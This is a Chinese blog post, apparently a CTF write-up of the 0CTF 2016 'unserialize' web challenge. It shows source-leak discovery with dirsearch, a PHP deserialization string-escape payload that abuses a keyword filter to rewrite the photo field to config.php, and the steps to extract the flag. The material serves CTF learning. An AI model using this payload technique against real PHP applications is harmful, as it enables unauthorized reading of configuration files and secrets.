[0ctf 2016]unserialize

最新推荐文章于 2024-07-13 18:55:19 发布
最新推荐文章于 2024-07-13 18:55:19 发布
阅读量311 收藏 5
点赞数 5
分类专栏: WEB CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liaochonxiang/article/details/140329583
版权
CTF 同时被 2 个专栏收录
53 篇文章 2 订阅
订阅专栏
WEB
6 篇文章 0 订阅
订阅专栏

像这种反序列化题都会有源码
image.png
目录扫描dirsearch -u http://node4.anna.nssctf.cn:28978/
image.png
得到www.zip源码
大致的查看源码,发现flag藏在config.php文件中
image.png
那我们需要找到可以调出config.php文件的代码
profile.php文件中发现调用photo文件路径
由此想到可以将photo文件路径修改为config.php
image.png
根据这个线,找到可利用点
image.png
nickname可以利用数组绕过过滤
同时可以利用class.php中的filter过滤
image.png
先构造正确的序列化

<?php
class f{
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
}
class u
{
	public $phone = "12345678901";
	public $email = "123@qq.com";
	public $nickname = array('');
	public $photo = "config.php";
	// public $photo = "upload/";
}
$s=new f;
$a=new u;
$b=serialize($a);
var_dump($b);
?>

结果:

string(135) "O:1:"u":4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:0:"";}s:5:"photo";s:10:"config.php";}"

错误的序列化

<?php
class f{
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
}
class u
{
	public $phone = "12345678901";
	public $email = "123@qq.com";
	public $nickname = array('');
	// public $photo = "config.php";
	public $photo = "upload/";
}
$s=new f;
$a=new u;
$b=serialize($a);
var_dump($b);
?>

结果:

string(131) "O:1:"u":4:{s:5:"phone";s:11:"12345678901";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:0:"";}s:5:"photo";s:7:"upload/";}"

需要将";}s:5:"photo";s:10:"config.php";}推到";}s:5:"photo";s:7:"upload/";}的位置。
";}s:5:"photo";s:10:"config.php";}的长度为34
所以需要多出34个字符
以此推算,hacker比where多出一个字符,34个where即可

<?php
class f{
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
}
class u
{
	public $phone = "12345678901";
	public $email = "123@qq.com";
	public $nickname = array('wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}');
	public $photo = "upload/";
}
$s=new f;
$a=new u;
var_dump($a);
$b=serialize($a);
// var_dump($b);
$c=$s->filter($b);
// var_dump($c);
$d=unserialize($c);
var_dump($d);
?>

结果:

class u#2 (4) {
  public $phone =>
  string(11) "12345678901"
  public $email =>
  string(10) "123@qq.com"
  public $nickname =>
  array(1) {
    [0] =>
    string(204) "wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}"
  }
  public $photo =>
  string(7) "upload/"
}
class u#3 (4) {
  public $phone =>
  string(11) "12345678901"
  public $email =>
  string(10) "123@qq.com"
  public $nickname =>
  array(1) {
    [0] =>
    string(204) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"
  }
  public $photo =>
  string(10) "config.php"
}

playload:

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

先输入http://node4.anna.nssctf.cn:28542/register.php随便注册一个账号
抓包update.php
image.png
修改相应的值,放包
image.png
查看网页源代码
image.png
将base64解密即可得到flag
image.png

liqingdi437
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2016华山杯ctf安卓题目
06-17
【标题】2016华山杯CTF(Capture The Flag)是一场专注于网络安全竞技的赛事,其中的安卓题目展示了该领域内的各种挑战与技术深度。CTF比赛通常包括逆向工程、密码学、Web安全、移动安全等多个方向,而安卓题目则...
CTF Writeups 2016.9.29
09-29
CTF Writeups 2016.9.29
[CTFTraining] 0CTF 2016 Unserialize
ZXW_NUDT的博客
06-01 2518
[CTFTraining] 0CTF 2016 Unserialize
0ctf_2016_unserialize
qq_53460654的博客
10-20 2946
打开环境 只有个登录框 应该存在源码泄露,直接试试访问www.zip 得到源码 直接自动代码审计 发现有疑似这些漏洞 但是没有找到我们的反序列化,因为题目就是反序列化 然后自己来审计一下 在profile.php中 $profile = unserialize($profile); $phone = $profile['phone']; $email = $profile['email']; $nickname = $profile['nickname']; $photo = base64_encode
0ctf_2016 _Web_unserialize
snowlyzz的博客
09-13 362
代码审计+反序列化
ctf之php序列化,0ctf_2016_unserialize(php反序列化逃逸字符)
weixin_39769228的博客
04-01 1051
一.0ctf_2016_unserialize(php反序列化逃逸字符)1234知识点:* 代码审计* Unserialize* LFR通过源码,我们可以发现在config.php中的flag,这题意图已经很明显了,是要我们读取config.php文件的内容。1234567...
0ctf_2016_warmup
05-17
20160ctf的pwn题。
Internetwache-CTF-2016, Internetwache CTF 2016存储库.zip
09-18
Internetwache-CTF-2016, Internetwache CTF 2016存储库 Internetwache CTF 2016这是 Internetwache CTF 2016存储库。 它包含所有用于构建和承载CTF的文件。工具和注释。 ctf.db 包含最终的记分板信息。的详细信息...
Internetwache-CTF-2016:Internetwache CTF 2016存储库
05-03
Internetwache CTF 2016 这是Internetwache CTF 2016存储库。 它包含用于构建和托管CTF的所有文件,工具和说明。 ctf.db包含最终的记分板信息。 CTF详细信息 日期:欧洲中部时间2月20日12:00 —欧洲中部时间2月22日...
PHP编程开发工具有哪些?
Pythonit教程网
07-10 993
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 961
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
PHP7.4安装使用rabbitMQ教程(windows)
qq_28546559的博客
07-09 219
1,可能报错ext-sockets * -> it is missing,在php.ini中开启sockets扩展既可。下载地址:https://pecl.php.net/package/amqp。3,修改php.ini文件,增加extension=php_amqp.dll。1,将php_amqp.dll放到对应的php的ext目录下。三,安装库——php-amqplib/php-amqplib。一,检查php版本phpinfo()——下载所需扩展。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 375
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
Vulnhub靶场DC-6练习
Reset
07-08 975
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权。
网关、DHCP协议、ip地址、子网掩码简单介绍
mantouyouyou的博客
07-11 1216
参考文章:https://baike.baidu.com/item/%E7%BD%91%E5%85%B3/98992?fr=ge_ala。
Layer2是什么?为什么需要Layer2?
weixin_37073932的博客
07-13 374
要了解Layer2前,需要先了解下Layer1。一层网络(Layer 1 Network)通常指的是区块链技术中的主链或基础层,它提供了区块链的核心功能和特性。去中心化:一层网络是去中心化的,没有单一的控制中心,由网络中的多个节点共同维护。安全性:一层网络通过加密算法和共识机制(如工作量证明Proof of Work或权益证明Proof of Stake)确保交易的安全性和不可篡改性。共识机制:一层网络使用特定的共识机制来验证交易和创建新区块,这是区块链网络达成一致的方式。智能合约。
ctfshow-web入门-php特性(web89-web95)intval 函数绕过
Welcome To Myon'Blog !
07-12 653
如果第一次匹配成功,再次使用正则表达式匹配 $a 是否等于字符串“php”,但这次只有不区分大小写,是单行模式,不会匹配多行,如果第二次没有匹配成功就会输出 flag。也就是说,如果 num 中不包含数字 "0" 就会终止程序,但是还有一种情况,如果这个 0 出现在开头,虽然是找到了有 0 这个字符,但是返回位置为 0 ,if (!== 是相等运算符,在进行比较时,会先将字符串类型转化成相同,再比较,比如比较一个数字和字符串或者比较涉及到数字内容的字符串,字符串会被转换成数值并按照数值来进行比较。
[Vulnhub] Simple CuteNews-CMS+Kernel权限提升
最新发布
07-13 89
#CuteNews-CMS #Kernel权限提升
青少年ctf web unserialize
08-28
青少年 CTF(Capture The Flag)比赛是一个针对青少年的网络安全竞赛。在 CTF 中的 Web 题目中,可能会涉及到反序列化(unserialize)漏洞。 反序列化漏洞是一种常见的安全问题,它发生在将数据从序列化的状态(例如,通过网络传输或存储在文件中)还原为对象时。攻击者可以利用这种漏洞来执行恶意代码或绕过安全控制。 在 CTF 的 Web 反序列化题目中,你可能需要使用一些技巧来利用该漏洞。常见的一种方法是构造恶意数据,通过传递给 unserialize 函数来触发代码执行。 请注意,在真实的环境中,反序列化漏洞可能会导致严重的安全问题,请确保在合法授权和合法场景下进行研究和实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值